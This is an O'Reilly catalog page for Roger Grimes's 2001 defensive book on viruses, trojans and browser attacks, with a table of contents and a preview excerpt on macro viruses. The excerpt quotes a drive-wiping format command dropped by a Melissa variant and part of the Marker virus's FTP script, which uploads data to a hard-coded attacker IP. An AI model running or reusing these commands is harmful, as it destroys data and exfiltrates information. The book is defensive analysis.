book

Malicious Mobile Code

Name: Malicious Mobile Code
Author: Roger A. Grimes
ISBN: 9781565926820

by Roger A. Grimes

August 2001

Intermediate to advanced

540 pages

18h 24m

English

O'Reilly Media, Inc.

Read now

Unlock full access

Malicious Mobile Code
Preface
About This Book
Why Another Book on Viruses?
What This Book Doesn’t Cover
Organization of the Book
Chapter Summary
Conventions Used in This Book
Software Covered in This Book
Comments and Questions
Acknowledgments
1. Introduction
The Hunt

What Is Malicious Mobile Code?
Major Types of Malicious Mobile CodeIn the WildMalicious Mobile Code NamingVGrepHow Bad Is the Problem of Malicious Code?Home StatisticsThe Growing ProblemAnti-malicious Mobile Code Organizations
Malicious Code and the Law
Malicious Code-Writing Subculture
Inside the Malicious Hacker’s MindTypical Virus WriterProtesting with Malicious CodeMalicious Mobile Code for the Social Good?Hacker Clubs, Newsletters, and ContestsMalicious Code Tutorial BooksHow Does Malicious Code Spread?
MMC Terminology
Summary
2. DOS Computer Viruses
Introduction
DOS Technologies
PC Boot Sequence.EXE and .COM Files.COM files.EXE filesSoftware to HardwareInterrupts
DOS Virus Technologies
Writing a Virus
Types of DOS Viruses
Boot VirusesHow boot viruses infect hard disksSpecial boot virus delivery methodsMemory ResidencyFile-Infecting VirusesOverwriting virusesCavity virusesAppending virusesOther executable typesCompanion virusesCluster viruses
Virus Defense Mechanisms
EncryptionPolymorphismEntry Point ChangersRandom ExecutionStealthArmorA Good Defense Is a Bad OffenseTrouble on the Horizon
Examples of DOS Viruses
Detecting a DOS-Based Computer Virus
Removing a DOS Virus
Protecting Yourself from Viruses
Risk Assessment -- Low
Summary
3. Windows Technologies
Windows TechnologiesWindows APIsWin32 API32-bit accessWindows BootingWindows Technologies Introduced with Windows 3.xText mode to GUI mode bootingVirtual machinesProgram information filesVirtual memory and swap filesNE executableCore Windows filesDynamic linking librariesProcesses and servicesInitialization filesSYSTEM.INIWIN.INIWININIT.INIStartup folderRegistration databaseFile type associationsHidden file extensionsFile types that can hurtResource sharingWindows 3.x Startup SequenceNew Technologies in Windows 9xOld carryoversDynamic VxDsWINSTART.BAT and DOSSTART.BATPortable executablesPassword filesIntegration of browser and web-based contentSafe modeHard drive file storage schemesMemory ringsWindows 9x Startup SequenceWindows NTSAM and NT securityAdministrators and domainsSystem accountsNTFSNT file streamsMultibootLogging and auditingNT 4.0 Boot Process
New Windows Versions
Windows MESystem restoreSystem file protectionWindows 2000Potentially abused componentsFuture Windows Versions
Summary
4. Viruses in a Windows World
DOS Viruses on Windows PlatformsOverall Effects on All Windows PlatformsBoot virus infectionsFile infectionsWindows 3.x/DOS Virus InteractionDOS boot viruses and Windows 3.xDOS file infectors under Windows 3.xWindows 9x/DOS Virus InteractionsWindows 9x antivirus featuresBoot viruses and Windows 9xDOS file infectors under Windows 9xWindows NT/DOS Virus InteractionBoot viruses under NTDOS file infectors under NTDOS Virus in Windows Summary
Windows Viruses on Windows Platforms
First Windows VirusesEffects of Windows VirusesWindows virus implications
Signs and Symptoms of Windows NT Virus Infections
Common Signs and SymptomsPrograms Won’t StartWindows Cannot Use 32-bit Disk SupportNT STOP ErrorsInstallation ErrorsSwap File Problems
Windows Virus Examples
WinNT.Remote ExplorerWinNT.InfisWin95.CIHWin32.KrizWin95.BabyloniaWin95.FonoWin95.PrizzyWin32.CryptoWin32.BolzanoWin2K.Stream
Detecting a Windows Virus
Unplug the PC from the NetworkUse an Antivirus ScannerUse AV Boot in Windows 2000Troubleshoot Any Boot ProblemsRun ScandiskBoot to Safe ModeLook for Newly Modified ExecutablesLook for Strange Programs That Automatically StartLook for Strange Device DriversLook for 32-bit Performance to be DisabledUnexpected System File Protection Messages
Removing Viruses
Use an Antivirus ScannerRemoving Boot VirusesBoot with a clean diskRemoving the Boot Virus Manually
Removing Infected Files
Research the VirusStop Any Virus ServicesBoot to the Command-line ModeDelete and Replace Infected FilesClean Up Startup AreasReplace Registry to Remove Malicious Startup ProgramsUsing System Recovery ToolsRestore from a Tape Backup
Preventing Viruses in Windows
Install Antivirus SoftwareDisable Booting from Drive ADon’t Run Untrusted CodeInstall Service Packs and UpdatesReveal File ExtensionsLimit Administrative LogonsTighten Security
Future
Risk Assessment -- Medium
Summary
5. Macro Viruses
Microsoft Office Version Numbers
What Is a Macro Virus?
Why Virus Writers Like Macro VirusesHow Macro Viruses SpreadWhat a Macro Virus Can Do
Microsoft Word and Excel Macros
Word MacrosAutomacrosVisual Basic for ApplicationsExcel Macros
Working with Macros
Macro EditorOrganizerVisual Basic Editor
Office 2000 Security
Security LevelsSigned MacrosTrusting Add-ins and TemplatesOffice 2000 Security Peculiarities
Macro Virus Technologies
Word InfectionsExcel InfectionsGeneral Macro Virus TechniquesClass module virusesOffice disables macro copying commandsMRU exploitsEmail virusesAdd-in virusesStealth macro virusesEncrypted and polymorphic macro virusesDropping off a friendMore external manipulation with VBAStartup directory filesRandom evolutionConstruction kitsCross-platform infectorsShiver cross-platform virusLanguage problems
Macro Virus Examples
W97M.Melissa.acW97M.MarkerCaligula Word VirusTriplicate VirusGaLaDRieLW2KM_PSD
Detecting Macro Viruses
Macro WarningsWays viruses can get around macro warningsFalse-positivesYour Word Document Will Only Save as a TemplateUnexpected Document Modifications,Words, Messages, GraphicsNew Macros AppearTools→Macro Is DisabledGlobal Template File Date Is CurrentStartup Directory Contains New FilesView the Document with a Text Editor
Removing Macro Viruses and Repairing the Damage
Try a Virus ScannerGet a Clean ApplicationBypass AutomacrosInspect Data and Delete Malicious MacrosRepairing Word DocumentsManually Repairing Other DamageRestore from a Backup
Preventing Macro Viruses
Disable Macros in DocumentsUpgrade All Versions of Office to the Latest VersionAutomate Document ScanningSet Office Security to HighLocking the VBA Normal ProjectSave Normal Template PromptConfirming Downloads for Office DocumentsRename DEBUG.EXEWord Startup SwitchesNetwork Security
Risk Assessment -- High
The Future of Macro VirusesGetting rid of Microsoft Office isn’t the answer
Summary
6. Trojans and Worms
The Threat
What Are Trojan Horses and Worms?
Signs and Symptoms
Types of Trojans
Remote Administration TrojansBackdoor ProgramsNetwork RedirectDistributed AttacksDenial of ServiceDirect ActionAudio and Video CapturingPhone Dialing TrojansPassword StealersKeyloggersParasites
Trojan Technology
StealthHiding as Source CodeCompressorsBindersSweep ListsScript Trojans
Becoming Familiar with Your PC
Startup ProgramsIP PortsTCP and UDPNetStat Command
Trojan and Worm Examples
Back OrificePICTURE.EXE TrojanWin32.Ska-Happy99Win32.ExplorerZipWin32.PrettyParkJS.KAK.WormBat.Chode.WormWin32.QazLife Stages Worm
Detecting and Removing Trojansand Worms
Cut Off Internet AccessUse Scanners and DetectorsCheck Your Startup FilesCheck MemoryLook for Trojan PortsDelete Trojan FilesExtra Steps for Email Worms
Preventing Trojans and Worms
Don’t Run Unknown Executable ContentScanners and Detector ProgramsDisable NetBIOS over TCP/IPDownload the Latest IE and OS PatchesPassword-Protect Drive SharesConsider Limiting Email AttachmentsRename or Remove Key ExecutablesChange File Associations of Potentially Harmful ProgramsUse FirewallsRun Programs as a Nonadmin
Risk Assessment -- High
Summary
7. Instant Messaging Attacks
Introduction to Instant MessagingTypes of Instant Messaging NetworksMobile Messaging
Types of Instant Messaging
ICQInternet Relay ChatWeb ChatsProprietary IM Standards
Introduction to Internet Relay Chat
IRC NetworksIRC ClientsIRC CommandsOther IRC FeaturesDCCCTCP
Hacking Instant Messaging
Hacking AIM and ICQPunters and bustersMalicious file transfersName hijackingIP address stealingWeb buffer overflowHacking IRCScript filesBotsLagFloodingNetSplitNick collision killChannel desyncsChannel warsNetwork redirection
Examples of IRC Attacks
Example Malicious ScriptsCTCP floodMass deop attackIRC Worms and TrojansSimpsalapimMr. WormyUsing IRC to Send VirusesSepticScript worms less of a threat now
Detecting Malicious IM
Removing Malicious IM
Protecting Yourself from IM Attacks
Risk Assessment -- Medium
Summary
8. Internet Browser Technologies
Introduction
Browser Technologies
What Is a Browser?Browser versionsURLsHiding malicious URLs
Web Languages
HTMLViewing HTML source codeHTML versionsXMLDHTMLScripting LanguagesJavaScriptVBScriptJScriptRemote scripting callsHypertext preprocessor scriptHTML Applications
Other Browser Technologies
Cascading Style SheetsPrivacy IssuesCookiesHistoryFramesFile and Password CachingAutoCompleteMicrosoft Wallet and PassportHTTPS and SSLActive DesktopSkins
When to Worry About Browser Content
Summary
9. Internet Browser Attacks
Browser-Based Exploits
Examples of Attacks and Exploits
Viruses and TrojansHTML.InternalPHP viruses and TrojanseBaylaHotmail password exploitEmbedded malicious code in shared postingsHTML applicationsBrowser Component ExploitsBrowser print templatesFile upload formsRedirection ExploitsWeb spoofingJavaScript redirectXML redirectCSS/DHTML redirectFrame problemsDotless IP address exploitApplication Interaction ExploitsRussian New YearMedia Player vulnerabilitiesPowerPoint buffer overflowOffice 2000 ODBC vulnerabilityTelnet attacksActive Desktop exploitsMore Office HTML exploitsPrivacy InvasionsCookie exploitsCookie hijackingWeb bugsApplication monitorsImportExportFavorites exploitCached data bugs
Detecting Internet Browser Attacks
Use an Antivirus Scanner or FirewallCheck Unexpected or Unexplained ErrorsView Source CodeLook for the FileSystemObject in ScriptsLook for Unexpected Newly Modified Files
Removing and Repairing the Damage
Remove Malicious FilesEdit or Delete Modified FilesRun Repair Tool
Preventing Internet Browser Attacks
Configure Browser Settings and ZonesInternet Explorer security settingsInternet Explorer security zonesInternet security registry settingsNew cookie management updateInternet Explorer Administration KitInstall the Latest Version of Browser and Security PatchesInstall and Use an Antivirus ScannerAvoid Untrusted Web SitesRemove HTA Association
Risk Assessment -- Medium
Summary
10. Malicious Java Applets
JavaJava Virtual MachineJava Byte CodeJava Applet Versus Java ApplicationJava’s Just-In-Time Compiler
Java Security
Java Security -- Classic ModelByte Code VerifierApplet Class LoaderName spacesThe Security ManagerCLASSPATHSome say the sandbox is too secureJava security expandsJava 2™ Security -- A Granular ApproachArchive FormatsJava archivesNot all Java browsers are created equally
Java Exploits
Paid to HackHistory of Java exploitsTypes of ExploitsAttacks within the sandboxSocial engineering appletsJava viruses and TrojansApplets that break the sandbox
Example Java Exploits
Annoying AppletsJava.NoisyBearHostile Thread Java appletDigiCrime’s IrritantJava VirusesStrange Brew Java virusBeanHive Java virusHoax Java bombsCompromising IntrusionsDNS subversion trickBug in the Java Byte Code VerifierMicrosoft Virtual Machine Verifier vulnerabilityPlug-ins
Detecting Malicious Java Applets
Removing Malicious Java Code
Protecting Yourself from Malicious Java Code
Total Security: Disable JavaRun Only Trusted JavaUse an Antivirus ScannerFirewallsConfigure Stronger Browser Java SecurityInternet Explorer Java securityJava-specific settings in Internet ExplorerJava Scratch PadCustomizing Java permissions in Internet ExplorerApply the Latest Security PatchesUse the Latest Browser VersionKnow Your Java CLASSPATHDisable Plug-insRemove Unneeded AppletsAvoid Malicious SitesBe Aware of Social-Engineered Malicious Code
Risk Assessment -- Low
Summary
11. Malicious ActiveX Controls
ActiveXActiveX ControlsActiveX ScriptingSafe for scripting and initializingDifferences Between ActiveX and JavaActivating ActiveXCabinet archival files
ActiveX Security
Digital Signing and CertificatesDigital authentication summaryEncryptionA simple encryption examplePublic key securityHashingCertificates and certificate authoritiesDigital certificate incompatibilitiesCertificate granting processTrusting the trust giverRevocationAlways trusting a certificateAuthenticodeJava, Authenticode, and Internet ExplorerTimestampingSigned Code in ActionInternet Explorer and Authenticoded Java
ActiveX Security Criticisms
ActiveX Has No SandboxSafe for Scripting VulnerabilityBuffer OverflowsUsers Can’t Be TrustedAuthenticity Doesn’t Prevent TamperingAuthenticode Is Only as Strong as Its Private KeysWeak RevocationNo GranularityActiveX Controls Are Registered to the MachineNo Easy Way to See All ControlsSecurity in Browser
Malicious ActiveX Examples
ExploderRunnerInfoSpace CompromiseQuicken ExploitMicrosoft’s Not Safe for Scripting ControlsNorton Utilities exploitHelp desk controlsDHTML edit vulnerabilityTaskpadsScriptlet.typlib and Eyedog exploitsOffice 2000 UA controlActive Setup controlWindows 2000 Sysmon Buffer Overflow
Detecting Malicious ActiveX Controls
Removing and Preventing Malicious Active Controls
Run Only Trusted CodeKill Bit SettingExamine CertificatesConfigure ActiveX Browser SecurityRemove Unnecessary ControlsReappearing controlsError messages while removing controlsViewing and removing all controlsView Trust RelationshipsChange Safe for Scripting FunctionalityEnable Certificate Revocation Checking
Risk Assessment -- Medium
Summary
12. Email Attacks
Introduction
Email Programs
Types of EmailMIMEEncrypted emailNewsgroupsPreview paneHiding behind emailWhy Is Outlook Such a Popular Target?Microsoft Outlook TechnologyOutlook interfacesWindows Scripting HostEncoded scriptsFuture of WSH
Email Exploits
Email WormsBubbleboyILoveYou virusHiding virusesHybrisEmail ExploitsUsers don’t even have to open email to execute exploitInternet cache vulnerabilityCompiled help vulnerabilityvCard buffer overflow
Detecting Email Attacks
Removing Infected Email
Information for Microsoft ExchangeServer AdministratorsExMerge
Preventing Email Attacks
Disable Scripting and HTML Content in EmailTreat Unexpected Emails with CautionKeep Email Client UpdatedRun Antivirus SoftwareImplement Outlook Security PatchGetting around blocked access to file attachmentsPreventing malicious code from using Outlook to spreadStrengthening overall Outlook securityOptions for Outlook 97 and Outlook Express usersProblems with Outlook Security UpdateUninstalling the Outlook Security UpdateRemove WSH AssociationReveal Hidden File ExtensionsIf You Use Web-based Email, Use Vendors Who Use Antivirus ScannersModify Security on Outlook ClientsSet Up Message Monitoring
Risk Assessment -- High
Summary
13. Hoax Viruses
The Mother of All Computer VirusesBamboozledWhy Do People Write Hoax Messages?Partial TruthsHoaxes Can Come True
Categories of Hoax Messages
Virus WarningGood Times virusChain LettersSympathy requestsFake news reportsGiveawaysThreats
Detection
Read Message Looking for Telltale SignsSearch for Information on HoaxWeb sites about hoaxesCommercial vendor web sites
Removing and Preventing Hoax Viruses
Let Others Know It Is a HoaxUse ExMerge to Delete All Hoax Messages at OnceSet Up an Email Filter
Risk Assessment -- Low
Future Hoaxes Will Be Better
Summary
14. Defense
Defense Strategy
Malicious Mobile Code Defense Plan
How to Create a Malicious Mobile Code Defense PlanGet management to buy inPick a plan teamPick an operational teamTake a technology inventoryDetermine plan coverageDiscuss and write the planTest the planImplement the planProvide quality assurance testingProtect new assetsTest Rapid Response TeamPredefine a process for updating and reviewing planThe PlanRemember to address foreign computers and networksPlan coreDeploymentDistributing updatesCommunication planEnd user educationRapid response planRapid Response Plan Steps
Use a Good Antivirus Scanner
Checksums Versus Scan StringsTraits of a Good Antivirus ScannerFast and accurateStabilityTransparencyRuns on your platformsCustomizableScanner should protect itselfGood cleaning rateScanning archived filesHeuristicsRescue disketteAutomated updatesGood technical supportProactive researchEnterprise capabilitiesLoggingNotificationEmail capabilities
Antivirus Scanning Locations
DesktopEmail ServerFile ServerInternet BorderWhere Should Antivirus Software Run?Other Antivirus Scanner ConsiderationsWhen to scanInternet-based scanningShould you disable the antivirus scanner to install new software?
The Best Steps Toward Securing Any Windows PC
Additional Defense Tools
FirewallsIntrusion DetectionHoney PotsPort Monitors and ScannersSecurity ScannersInternet Content ScannersMiscellaneous UtilitiesSmartWhoIsLocking programs downFilemon and RegmonGoat filesGood Backup
Antivirus Product Review
Symantec’s Norton Antivirus
Future
Summary
15. The Future
The Future of ComputingMedia ConvergenceDistributed ComputingOther Key Technology ChangesP2P computingMicrosoft’s domination weakensSmall computersAppliance computingGovernment monitoring
MMC Exploits
Malicious Code Popularity Will IncreaseHacktivism Will RiseIncrease in Linux VirusesConnectedness Can Be a WeaknessDenial of Service AttacksAttack of the Killer Copier
Real Defense Solutions
Audit All CodeUltimate AuthenticationMore Secure ApplicationsPrevent Unauthorized Code ChangesISP ScanningAllow Only Approved Content to ExecuteNational Security InfrastructureStiffer Penalties
Summary
Index
Colophon

Content preview from Malicious Mobile Code

Macro Virus Examples

Here are some representative sample descriptions that demonstrate the versatility of macro viruses.

W97M.Melissa.ac

This Melissa variant attempts to format local hard drives and corrupts CMOS memory, along with using email clients to forward itself. It drops off a batch file, called DRIVES.BAT , that contains the following the commands that will format hard drives:

echo y|format/q d: /v:Empty>NUL

This command is repeated for drives D thru Z.

It also edits the AUTOEXEC.BAT file to run a dropped malicious file, Y2K.COM . This executable file will attempt to corrupt your CMOS settings (disabling the hard drive, etc.), but usually does not result in permanent damage to your CMOS.

W97M.Marker

Marker is a Word macro virus that keeps track of who it infects and transmits this information to a well-known hacker site (now closed). It creates two temporary ASCII text files on the local hard drive with names like NETLDX.VXD and HSFEDRT.SYS . The .SYS file contains the virus code and the .VXD file is a script file that is used with FTP.EXE to send information back to the hackers. The .VXD file contains the commands in Example 5-4 to which I have added comments:

Example 5-4. Marker virus FTP script file

o 209.201.88.110 ;opens an ftp connection to hacker's ftp site user anonymous ;logs user in as anonymous pass itsme@ ;puts in password cd incoming ;changes to subdirectory called incoming on hacker's site ascii ;puts file transfer in ascii text transmission mode put hsfedrt.sys ...

Become an O’Reilly member and get unlimited access to this title plus top books and audiobooks from O’Reilly and nearly 200 top publishers, thousands of courses curated by job role, 150+ live events each month,
and much more.

Read now

Unlock full access

More than 5,000 organizations count on O’Reilly

O’Reilly covers everything we've got, with content to help us build a world-class technology community, upgrade the capabilities and competencies of our teams, and improve overall team performance as well as their engagement.

Julian F.

Head of Cybersecurity

I wanted to learn C and C++, but it didn't click for me until I picked up an O'Reilly book. When I went on the O’Reilly platform, I was astonished to find all the books there, plus live events and sandboxes so you could play around with the technology.

Addison B.

Field Engineer

I’ve been on the O’Reilly platform for more than eight years. I use a couple of learning platforms, but I'm on O'Reilly more than anybody else. When you're there, you start learning. I'm never disappointed.

Amir M.

Data Platform Tech Lead

I'm always learning. So when I got on to O'Reilly, I was like a kid in a candy store. There are playlists. There are answers. There's on-demand training. It's worth its weight in gold, in terms of what it allows me to do.

Mark W.

Embedded Software Engineer

Publisher Resources

ISBN: 156592682XErrata Page

Cloud Computing

Data Engineering

Data Science

AI & ML

Programming Languages

Software Architecture

IT/Ops

Security

Design

Business

Soft Skills